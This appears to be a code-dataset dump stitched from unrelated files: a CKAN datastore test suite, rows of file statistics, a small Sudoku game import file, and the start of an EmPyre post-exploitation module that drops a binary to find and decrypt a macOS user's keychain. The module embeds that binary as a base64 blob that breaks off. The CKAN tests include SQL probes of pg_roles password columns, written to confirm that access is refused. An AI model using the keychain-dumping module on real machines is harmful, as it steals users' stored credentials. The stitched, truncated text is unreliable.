assert res_dict["error"].get("fields") is not None, res_dict["error"]
class TestDatastoreFullTextSearchLegacyTests(object):
@pytest.fixture(autouse=True)
def initial_data(self, clean_datastore, app):
ctd.CreateTestData.create()
self.sysadmin_user = model.User.get("testsysadmin")
self.normal_user = model.User.get("annafan")
resource = model.Package.get("annakarenina").resources[0]
self.data = dict(
resource_id=resource.id,
force=True,
fields=[
{"id": "id"},
{"id": "date", "type": "date"},
{"id": "x"},
{"id": "y"},
{"id": "z"},
{"id": "country"},
{"id": "title"},
{"id": "lat"},
{"id": "lon"},
],
records=[
{
"id": 0,
"date": "2011-01-01",
"x": 1,
"y": 2,
"z": 3,
"country": "DE",
"title": "first 99",
"lat": 52.56,
"lon": 13.40,
},
{
"id": 1,
"date": "2011-02-02",
"x": 2,
"y": 4,
"z": 24,
"country": "UK",
"title": "second",
"lat": 54.97,
"lon": -1.60,
},
{
"id": 2,
"date": "2011-03-03",
"x": 3,
"y": 6,
"z": 9,
"country": "US",
"title": "third",
"lat": 40.00,
"lon": -75.5,
},
{
"id": 3,
"date": "2011-04-04",
"x": 4,
"y": 8,
"z": 6,
"country": "UK",
"title": "fourth",
"lat": 57.27,
"lon": -6.20,
},
{
"id": 4,
"date": "2011-05-04",
"x": 5,
"y": 10,
"z": 15,
"country": "UK",
"title": "fifth",
"lat": 51.58,
"lon": 0,
},
{
"id": 5,
"date": "2011-06-02",
"x": 6,
"y": 12,
"z": 18,
"country": "DE",
"title": "sixth 53.56",
"lat": 51.04,
"lon": 7.9,
},
],
)
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_create", json=self.data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_full_text(self, app):
data = {"resource_id": self.data["resource_id"], "q": "DE"}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["result"]["total"] == 2
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_advanced_search_full_text(self, app):
data = {
"resource_id": self.data["resource_id"],
"plain": "False",
"q": "DE | UK",
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["result"]["total"] == 5
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_full_text_search_on_integers_within_text_strings(self, app):
data = {"resource_id": self.data["resource_id"], "q": "99"}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["result"]["total"] == 1
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_full_text_search_on_integers(self, app):
data = {"resource_id": self.data["resource_id"], "q": "4"}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["result"]["total"] == 3
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_full_text_search_on_decimal_within_text_strings(self, app):
data = {"resource_id": self.data["resource_id"], "q": "53.56"}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["result"]["total"] == 1
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_full_text_search_on_decimal(self, app):
data = {"resource_id": self.data["resource_id"], "q": "52.56"}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["result"]["total"] == 1
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_full_text_search_on_date(self, app):
data = {"resource_id": self.data["resource_id"], "q": "2011-01-01"}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["result"]["total"] == 1
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_full_text_search_on_json_like_string_succeeds(self, app):
data = {"resource_id": self.data["resource_id"], "q": '"{}"'}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"]
class TestDatastoreSQLLegacyTests(object):
sysadmin_user = None
normal_user = None
@pytest.fixture(autouse=True)
def initial_data(self, clean_datastore, app):
ctd.CreateTestData.create()
self.sysadmin_user = model.User.get("testsysadmin")
self.normal_user = model.User.get("annafan")
self.dataset = model.Package.get("annakarenina")
resource = self.dataset.resources[0]
self.data = {
"resource_id": resource.id,
"force": True,
"aliases": "books4",
"fields": [
{"id": u"b\xfck", "type": "text"},
{"id": "author", "type": "text"},
{"id": "published"},
],
"records": [
{
u"b\xfck": "annakarenina",
"author": "tolstoy",
"published": "2005-03-01",
"nested": ["b", {"moo": "moo"}],
},
{
u"b\xfck": "warandpeace",
"author": "tolstoy",
"nested": {"a": "b"},
},
],
}
auth = {"Authorization": str(self.sysadmin_user.apikey)}
res = app.post(
"/api/action/datastore_create", json=self.data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
# Make an organization, because private datasets must belong to one.
self.organization = tests.call_action_api(
app,
"organization_create",
name="test_org",
apikey=self.sysadmin_user.apikey,
)
self.expected_records = [
{
u"_full_text": [
u"'annakarenina'",
u"'b'",
u"'moo'",
u"'tolstoy'",
u"'2005'",
],
u"_id": 1,
u"author": u"tolstoy",
u"b\xfck": u"annakarenina",
u"nested": [u"b", {u"moo": u"moo"}],
u"published": u"2005-03-01T00:00:00",
},
{
u"_full_text": [u"'tolstoy'", u"'warandpeac'", u"'b'"],
u"_id": 2,
u"author": u"tolstoy",
u"b\xfck": u"warandpeace",
u"nested": {u"a": u"b"},
u"published": None,
},
]
self.expected_join_results = [
{u"first": 1, u"second": 1},
{u"first": 1, u"second": 2},
]
engine = db.get_write_engine()
self.Session = orm.scoped_session(orm.sessionmaker(bind=engine))
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_select_where_like_with_percent(self, app):
query = 'SELECT * FROM public."{0}" WHERE "author" LIKE \'tol%\''.format(
self.data["resource_id"]
)
data = {"sql": query}
auth = {"Authorization": str(self.sysadmin_user.apikey)}
res = app.post(
"/api/action/datastore_search_sql", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert len(result["records"]) == len(self.expected_records)
for (row_index, row) in enumerate(result["records"]):
expected_row = self.expected_records[row_index]
assert set(row.keys()) == set(expected_row.keys())
for field in row:
if field == "_full_text":
for ft_value in expected_row["_full_text"]:
assert ft_value in row["_full_text"]
else:
assert row[field] == expected_row[field]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_self_join(self, app):
query = """
select a._id as first, b._id as second
from "{0}" AS a,
"{0}" AS b
where a.author = b.author
limit 2
""".format(
self.data["resource_id"]
)
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search_sql",
json={"sql": query},
extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["records"] == self.expected_join_results
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures(
"clean_datastore", "with_plugins", "with_request_context"
)
def test_new_datastore_table_from_private_resource(self, app):
# make a private CKAN resource
group = self.dataset.get_groups()[0]
context = {
"user": self.sysadmin_user.name,
"ignore_auth": True,
"model": model,
}
package = p.toolkit.get_action("package_create")(
context,
{
"name": "privatedataset",
"private": True,
"owner_org": self.organization["id"],
"groups": [{"id": group.id}],
},
)
resource = p.toolkit.get_action("resource_create")(
context,
{
"name": "privateresource",
"url": "https://www.example.com/",
"package_id": package["id"],
},
)
auth = {"Authorization": str(self.sysadmin_user.apikey)}
helpers.call_action(
"datastore_create", resource_id=resource["id"], force=True
)
# new resource should be private
query = 'SELECT * FROM "{0}"'.format(resource["id"])
data = {"sql": query}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search_sql",
json=data,
extra_environ=auth,
status=403,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
assert res_dict["error"]["__type"] == "Authorization Error"
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_not_authorized_to_access_system_tables(self, app):
test_cases = [
"SELECT * FROM pg_roles",
"SELECT * FROM pg_catalog.pg_database",
"SELECT rolpassword FROM pg_roles",
"""SELECT p.rolpassword
FROM pg_roles p
JOIN "{0}" r
ON p.rolpassword = r.author""".format(
self.data["resource_id"]
),
]
for query in test_cases:
data = {"sql": query.replace("\n", "")}
res = app.post(
"/api/action/datastore_search_sql", json=data, status=403,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
assert res_dict["error"]["__type"] == "Authorization Error"
class TestDatastoreSQLFunctional(object):
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures(
"clean_datastore", "with_plugins", "with_request_context"
)
def test_search_sql_enforces_private(self):
user1 = factories.User()
user2 = factories.User()
user3 = factories.User()
ctx1 = {u"user": user1["name"], u"ignore_auth": False}
ctx2 = {u"user": user2["name"], u"ignore_auth": False}
ctx3 = {u"user": user3["name"], u"ignore_auth": False}
org1 = factories.Organization(
user=user1,
users=[{u"name": user3["name"], u"capacity": u"member"}],
)
org2 = factories.Organization(
user=user2,
users=[{u"name": user3["name"], u"capacity": u"member"}],
)
ds1 = factories.Dataset(owner_org=org1["id"], private=True)
ds2 = factories.Dataset(owner_org=org2["id"], private=True)
r1 = helpers.call_action(
u"datastore_create",
resource={u"package_id": ds1["id"]},
fields=[{u"id": u"spam", u"type": u"text"}],
)
r2 = helpers.call_action(
u"datastore_create",
resource={u"package_id": ds2["id"]},
fields=[{u"id": u"ham", u"type": u"text"}],
)
sql1 = 'SELECT spam FROM "{0}"'.format(r1["resource_id"])
sql2 = 'SELECT ham FROM "{0}"'.format(r2["resource_id"])
sql3 = 'SELECT spam, ham FROM "{0}", "{1}"'.format(
r1["resource_id"], r2["resource_id"]
)
with pytest.raises(p.toolkit.NotAuthorized):
helpers.call_action("datastore_search_sql", context=ctx2, sql=sql1)
with pytest.raises(p.toolkit.NotAuthorized):
helpers.call_action("datastore_search_sql", context=ctx1, sql=sql2)
with pytest.raises(p.toolkit.NotAuthorized):
helpers.call_action("datastore_search_sql", context=ctx1, sql=sql3)
with pytest.raises(p.toolkit.NotAuthorized):
helpers.call_action("datastore_search_sql", context=ctx2, sql=sql3)
helpers.call_action("datastore_search_sql", context=ctx1, sql=sql1)
helpers.call_action("datastore_search_sql", context=ctx2, sql=sql2)
helpers.call_action("datastore_search_sql", context=ctx3, sql=sql3)
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_validates_sql_has_a_single_statement(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"the year": 2014}, {"the year": 2013}],
}
helpers.call_action("datastore_create", **data)
sql = 'SELECT * FROM public."{0}"; SELECT * FROM public."{0}";'.format(
resource["id"]
)
with pytest.raises(
p.toolkit.ValidationError, match="Query is not a single statement"
):
helpers.call_action("datastore_search_sql", sql=sql)
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_works_with_semicolons_inside_strings(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"author": "bob"}, {"author": "jane"}],
}
helpers.call_action("datastore_create", **data)
sql = 'SELECT * FROM public."{0}" WHERE "author" = \'foo; bar\''.format(
resource["id"]
)
helpers.call_action("datastore_search_sql", sql=sql)
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_works_with_allowed_functions(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"author": "bob"}, {"author": "jane"}],
}
helpers.call_action("datastore_create", **data)
sql = 'SELECT upper(author) from "{}"'.format(
resource["id"]
)
helpers.call_action("datastore_search_sql", sql=sql)
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_not_authorized_with_disallowed_functions(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [{"author": "bob"}, {"author": "jane"}],
}
helpers.call_action("datastore_create", **data)
sql = "SELECT query_to_xml('SELECT upper(author) from \"{}\"', true, true, '')".format(
resource["id"]
)
with pytest.raises(p.toolkit.NotAuthorized):
helpers.call_action("datastore_search_sql", sql=sql)
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_invalid_statement(self):
sql = "SELECT ** FROM foobar"
with pytest.raises(
logic.ValidationError, match='syntax error at or near "FROM"'
):
helpers.call_action("datastore_search_sql", sql=sql)
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_select_basic(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [
{
u"b\xfck": "annakarenina",
"author": "tolstoy",
"published": "2005-03-01",
"nested": ["b", {"moo": "moo"}],
},
{
u"b\xfck": "warandpeace",
"author": "tolstoy",
"nested": {"a": "b"},
},
],
}
expected_records = [
{
u"_full_text": [
u"'annakarenina'",
u"'b'",
u"'moo'",
u"'tolstoy'",
u"'2005'",
],
u"_id": 1,
u"author": u"tolstoy",
u"b\xfck": u"annakarenina",
u"nested": [u"b", {u"moo": u"moo"}],
u"published": u"2005-03-01T00:00:00",
},
{
u"_full_text": [u"'tolstoy'", u"'warandpeac'", u"'b'"],
u"_id": 2,
u"author": u"tolstoy",
u"b\xfck": u"warandpeace",
u"nested": {u"a": u"b"},
u"published": None,
},
]
helpers.call_action("datastore_create", **data)
sql = 'SELECT * FROM "{0}"'.format(resource["id"])
result = helpers.call_action("datastore_search_sql", sql=sql)
assert len(result["records"]) == 2
for (row_index, row) in enumerate(result["records"]):
expected_row = expected_records[row_index]
assert set(row.keys()) == set(expected_row.keys())
for field in row:
if field == "_full_text":
for ft_value in expected_row["_full_text"]:
assert ft_value in row["_full_text"]
else:
assert row[field] == expected_row[field]
assert u"records_truncated" not in result
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_alias_search(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"aliases": "books4",
"records": [
{
u"b\xfck": "annakarenina",
"author": "tolstoy",
"published": "2005-03-01",
"nested": ["b", {"moo": "moo"}],
},
{
u"b\xfck": "warandpeace",
"author": "tolstoy",
"nested": {"a": "b"},
},
],
}
helpers.call_action("datastore_create", **data)
sql = 'SELECT * FROM "{0}"'.format(resource["id"])
result = helpers.call_action("datastore_search_sql", sql=sql)
sql = 'SELECT * FROM "books4"'
result_with_alias = helpers.call_action(
"datastore_search_sql", sql=sql
)
assert result["records"] == result_with_alias["records"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
@pytest.mark.ckan_config("ckan.datastore.search.rows_max", "2")
def test_search_limit(self):
resource = factories.Resource()
data = {
"resource_id": resource["id"],
"force": True,
"records": [
{"the year": 2014},
{"the year": 2013},
{"the year": 2015},
{"the year": 2016},
],
}
result = helpers.call_action("datastore_create", **data)
sql = 'SELECT * FROM "{0}"'.format(resource["id"])
result = helpers.call_action("datastore_search_sql", sql=sql)
assert len(result["records"]) == 2
assert [res[u"the year"] for res in result["records"]] == [2014, 2013]
assert result[u"records_truncated"]
@pytest.mark.usefixtures("with_request_context")
class TestDatastoreSearchRecordsFormat(object):
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_sort_results_objects(self):
ds = factories.Dataset()
r = helpers.call_action(
u"datastore_create",
resource={u"package_id": ds["id"]},
fields=[
{u"id": u"num", u"type": u"numeric"},
{u"id": u"dt", u"type": u"timestamp"},
{u"id": u"txt", u"type": u"text"},
],
records=[
{u"num": 10, u"dt": u"2020-01-01", u"txt": "aaab"},
{u"num": 9, u"dt": u"2020-01-02", u"txt": "aaab"},
{u"num": 9, u"dt": u"2020-01-01", u"txt": "aaac"},
],
)
assert helpers.call_action(
"datastore_search", resource_id=r["resource_id"], sort=u"num, dt"
)["records"] == [
{
u"_id": 3,
u"num": 9,
u"dt": u"2020-01-01T00:00:00",
u"txt": u"aaac",
},
{
u"_id": 2,
u"num": 9,
u"dt": u"2020-01-02T00:00:00",
u"txt": u"aaab",
},
{
u"_id": 1,
u"num": 10,
u"dt": u"2020-01-01T00:00:00",
u"txt": u"aaab",
},
]
assert helpers.call_action(
"datastore_search", resource_id=r["resource_id"], sort=u"dt, txt"
)["records"] == [
{
u"_id": 1,
u"num": 10,
u"dt": u"2020-01-01T00:00:00",
u"txt": u"aaab",
},
{
u"_id": 3,
u"num": 9,
u"dt": u"2020-01-01T00:00:00",
u"txt": u"aaac",
},
{
u"_id": 2,
u"num": 9,
u"dt": u"2020-01-02T00:00:00",
u"txt": u"aaab",
},
]
assert helpers.call_action(
"datastore_search", resource_id=r["resource_id"], sort=u"txt, num"
)["records"] == [
{
u"_id": 2,
u"num": 9,
u"dt": u"2020-01-02T00:00:00",
u"txt": u"aaab",
},
{
u"_id": 1,
u"num": 10,
u"dt": u"2020-01-01T00:00:00",
u"txt": u"aaab",
},
{
u"_id": 3,
u"num": 9,
u"dt": u"2020-01-01T00:00:00",
u"txt": u"aaac",
},
]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_sort_results_lists(self):
ds = factories.Dataset()
r = helpers.call_action(
u"datastore_create",
resource={u"package_id": ds["id"]},
fields=[
{u"id": u"num", u"type": u"numeric"},
{u"id": u"dt", u"type": u"timestamp"},
{u"id": u"txt", u"type": u"text"},
],
records=[
{u"num": 10, u"dt": u"2020-01-01", u"txt": u"aaab"},
{u"num": 9, u"dt": u"2020-01-02", u"txt": u"aaab"},
{u"num": 9, u"dt": u"2020-01-01", u"txt": u"aaac"},
],
)
assert helpers.call_action(
"datastore_search",
resource_id=r["resource_id"],
records_format=u"lists",
sort=u"num, dt",
)["records"] == [
[3, 9, u"2020-01-01T00:00:00", u"aaac"],
[2, 9, u"2020-01-02T00:00:00", u"aaab"],
[1, 10, u"2020-01-01T00:00:00", u"aaab"],
]
assert helpers.call_action(
"datastore_search",
resource_id=r["resource_id"],
records_format=u"lists",
sort=u"dt, txt",
)["records"] == [
[1, 10, u"2020-01-01T00:00:00", u"aaab"],
[3, 9, u"2020-01-01T00:00:00", u"aaac"],
[2, 9, u"2020-01-02T00:00:00", u"aaab"],
]
assert helpers.call_action(
"datastore_search",
resource_id=r["resource_id"],
records_format=u"lists",
sort=u"txt, num",
)["records"] == [
[2, 9, u"2020-01-02T00:00:00", u"aaab"],
[1, 10, u"2020-01-01T00:00:00", u"aaab"],
[3, 9, u"2020-01-01T00:00:00", u"aaac"],
]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_sort_results_csv(self):
ds = factories.Dataset()
r = helpers.call_action(
u"datastore_create",
resource={u"package_id": ds["id"]},
fields=[
{u"id": u"num", u"type": u"numeric"},
{u"id": u"dt", u"type": u"timestamp"},
{u"id": u"txt", u"type": u"text"},
],
records=[
{u"num": 10, u"dt": u"2020-01-01", u"txt": u"aaab"},
{u"num": 9, u"dt": u"2020-01-02", u"txt": u"aaab"},
{u"num": 9, u"dt": u"2020-01-01", u"txt": u"aaac"},
],
)
assert (
helpers.call_action(
"datastore_search",
resource_id=r["resource_id"],
records_format=u"csv",
sort=u"num, dt",
)["records"]
== u"3,9,2020-01-01T00:00:00,aaac\n"
u"2,9,2020-01-02T00:00:00,aaab\n"
u"1,10,2020-01-01T00:00:00,aaab\n"
)
assert (
helpers.call_action(
"datastore_search",
resource_id=r["resource_id"],
records_format=u"csv",
sort=u"dt, txt",
)["records"]
== u"1,10,2020-01-01T00:00:00,aaab\n"
u"3,9,2020-01-01T00:00:00,aaac\n"
u"2,9,2020-01-02T00:00:00,aaab\n"
)
assert (
helpers.call_action(
"datastore_search",
resource_id=r["resource_id"],
records_format=u"csv",
sort=u"txt, num",
)["records"]
== u"2,9,2020-01-02T00:00:00,aaab\n"
u"1,10,2020-01-01T00:00:00,aaab\n"
u"3,9,2020-01-01T00:00:00,aaac\n"
)
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_fields_results_csv(self):
ds = factories.Dataset()
r = helpers.call_action(
u"datastore_create",
resource={u"package_id": ds["id"]},
fields=[
{u"id": u"num", u"type": u"numeric"},
{u"id": u"dt", u"type": u"timestamp"},
{u"id": u"txt", u"type": u"text"},
],
records=[
{u"num": 9, u"dt": u"2020-01-02", u"txt": u"aaab"},
{u"num": 9, u"dt": u"2020-01-01", u"txt": u"aaac"},
],
)
r = helpers.call_action(
"datastore_search",
resource_id=r["resource_id"],
records_format=u"csv",
fields=u"dt, num, txt",
)
assert r["fields"] == [
{u"id": u"dt", u"type": u"timestamp"},
{u"id": u"num", u"type": u"numeric"},
{u"id": u"txt", u"type": u"text"},
]
assert (
r["records"] == u"2020-01-02T00:00:00,9,aaab\n"
u"2020-01-01T00:00:00,9,aaac\n"
)
r = helpers.call_action(
"datastore_search",
resource_id=r["resource_id"],
records_format=u"csv",
fields=u"dt",
q=u"aaac",
)
assert r["fields"] == [{u"id": u"dt", u"type": u"timestamp"}]
assert r["records"] == u"2020-01-01T00:00:00\n"
r = helpers.call_action(
"datastore_search",
resource_id=r["resource_id"],
records_format=u"csv",
fields=u"txt, rank txt",
q={u"txt": u"aaac"},
)
assert r["fields"] == [
{u"id": u"txt", u"type": u"text"},
{u"id": u"rank txt", u"type": u"float"},
]
assert r["records"][:7] == u"aaac,0."
| 37.490361
| 95
| 0.527933
| 8,238
| 75,843
| 4.684996
| 0.054382
| 0.058039
| 0.045343
| 0.051872
| 0.881487
| 0.868662
| 0.850784
| 0.839876
| 0.829952
| 0.812359
| 0
| 0.0248
| 0.320544
| 75,843
| 2,022
| 96
| 37.508902
| 0.724152
| 0.014069
| 0
| 0.668101
| 0
| 0
| 0.234
| 0.027498
| 0
| 0
| 0
| 0
| 0.084454
| 1
| 0.039268
| false
| 0.001076
| 0.006455
| 0
| 0.051103
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6a605abae7e4ee590087c3d9facd08045b5b0e46
| 97
|
py
|
Python
|
Game/__init__.py
|
anchitmulye/Sudoku-pygame
|
55aaf692dd4063a015b67d0b53a2284c78451987
|
[
"MIT"
] | 3
|
2018-07-18T05:18:20.000Z
|
2020-11-03T19:44:39.000Z
|
Game/__init__.py
|
anchitmulye/Sudoku-pygame
|
55aaf692dd4063a015b67d0b53a2284c78451987
|
[
"MIT"
] | null | null | null |
Game/__init__.py
|
anchitmulye/Sudoku-pygame
|
55aaf692dd4063a015b67d0b53a2284c78451987
|
[
"MIT"
] | 4
|
2019-06-11T05:48:48.000Z
|
2022-01-26T14:08:37.000Z
|
from Game.HighScore import Highscore
from Game.Level import Level
from Game.Sudoku import Sudoku
| 24.25
| 36
| 0.845361
| 15
| 97
| 5.466667
| 0.4
| 0.292683
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123711
| 97
| 3
| 37
| 32.333333
| 0.964706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6a84e44403cec177c412cb74a3725e6712a3f59e
| 29,097
|
py
|
Python
|
lib/modules/collection/osx/keychaindump.py
|
mibboy/EmPyre
|
63548b18e3c242bf44bc40e4156e8153ca20eb91
|
[
"BSD-3-Clause"
] | 527
|
2017-02-02T13:59:45.000Z
|
2022-03-19T03:22:05.000Z
|
lib/modules/collection/osx/keychaindump.py
|
mibboy/EmPyre
|
63548b18e3c242bf44bc40e4156e8153ca20eb91
|
[
"BSD-3-Clause"
] | 9
|
2017-02-02T14:06:04.000Z
|
2017-12-28T08:21:10.000Z
|
lib/modules/collection/osx/keychaindump.py
|
mibboy/EmPyre
|
63548b18e3c242bf44bc40e4156e8153ca20eb91
|
[
"BSD-3-Clause"
] | 164
|
2017-02-02T14:05:35.000Z
|
2022-03-22T16:47:58.000Z
|
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Webcam',
# list of one or more authors for the module
'Author': ['Juuso Salonen'],
# more verbose multi-line description of the module
'Description': ("Searches for keychain candidates and attempts to decrypt the user's keychain."),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : "",
# if the module needs administrative privileges
'NeedsAdmin' : True,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : False,
# list of any references/other comments
'Comments': [
"https://github.com/juuso/keychaindump"
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'TempDir' : {
'Description' : 'Temporary directory to drop the keychaindump binary.',
'Required' : True,
'Value' : '/tmp/'
},
'KeyChain' : {
'Description' : 'Manual location of keychain to decrypt, otherwise default.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
keyChain = self.options['KeyChain']['Value']
tempDir = self.options['TempDir']['Value']
if not tempDir.endswith("/"):
tempDir += "/"
script = """
import base64
import os
keychaindump = "z/rt/gcAAAEDAACAAgAAABAAAAAoBgAAhQAgAAAAAAAZAAAASAAAAF9fUEFHRVpFUk8AAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAAeAIAAF9fVEVYVAAAAAAAAAAAAAAAAAAAAQAAAAAwAAAAAAAAAAAAAAAAAAAAMAAAAAAAAAcAAAAFAAAABwAAAAAAAABfX3RleHQAAAAAAAAAAAAAX19URVhUAAAAAAAAAAAAANAQAAABAAAArRkAAAAAAADQEAAABAAAAAAAAAAAAAAAAAQAgAAAAAAAAAAAAAAAAF9fc3R1YnMAAAAAAAAAAABfX1RFWFQAAAAAAAAAAAAAfioAAAEAAACuAAAAAAAAAH4qAAABAAAAAAAAAAAAAAAIBACAAAAAAAYAAAAAAAAAX19zdHViX2hlbHBlcgAAAF9fVEVYVAAAAAAAAAAAAAAsKwAAAQAAADIBAAAAAAAALCsAAAIAAAAAAAAAAAAAAAAEAIAAAAAAAAAAAAAAAABfX2NzdHJpbmcAAAAAAAAAX19URVhUAAAAAAAAAAAAAF4sAAABAAAAMQMAAAAAAABeLAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAF9fY29uc3QAAAAAAAAAAABfX1RFWFQAAAAAAAAAAAAAkC8AAAEAAAAQAAAAAAAAAJAvAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX191bndpbmRfaW5mbwAAAF9fVEVYVAAAAAAAAAAAAACgLwAAAQAAAEgAAAAAAAAAoC8AAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABfX2VoX2ZyYW1lAAAAAAAAX19URVhUAAAAAAAAAAAAAOgvAAABAAAAGAAAAAAAAADoLwAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABkAAACIAQAAX19EQVRBAAAAAAAAAAAAAAAwAAABAAAAABAAAAAAAAAAMAAAAAAAAAAQAAAAAAAABwAAAAMAAAAEAAAAAAAAAF9fbmxfc3ltYm9sX3B0cgBfX0RBVEEAAAAAAAAAAAAAADAAAAEAAAAQAAAAAAAAAAAwAAADAAAAAAAAAAAAAA